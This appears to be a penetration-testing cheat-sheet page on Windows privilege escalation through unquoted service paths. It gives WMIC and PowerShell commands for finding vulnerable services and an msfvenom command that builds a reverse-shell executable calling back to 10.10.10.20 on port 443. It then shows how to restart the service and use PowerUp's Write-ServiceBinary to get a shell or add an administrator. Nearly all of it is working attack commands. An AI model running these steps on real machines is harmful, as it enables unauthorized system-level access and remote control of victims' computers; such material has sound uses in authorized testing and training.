Unquoted Service Path
The following command will search for all the paths except "C:\windows" since a normal user will not have executable permissions on this folder.
## Windows Management Instrumentation Command-Line (WMIC) ##
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
## WMI (Powershell) ##
Get-WmiObject win32_service | select Name,PathName,StartMode,StartName | where {$_.StartMode -ne "Disabled" -and $_.StartName -eq "LocalSystem" -and $_.PathName -notmatch "`"" -and $_.PathName -notmatch "C:\\Windows"} | Format-List
If a service is found with unquoted path check the permissions of the service with icacls. If we have permissions on any of the folders that leads to the executable then we can escalate our privileges.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.20 LPORT=443 -f exe > /root/same_service_name_as_above.exe
sc stop service_name
sc start service_name
Within powershell run the following.
# Find them
Get-ServiceUnquoted
# Execure a reverse shell or adding new user as administrator.
Write-ServiceBinary -name "Service_Name" -Path "C:\Service_name.exe"
Last modified 1yr ago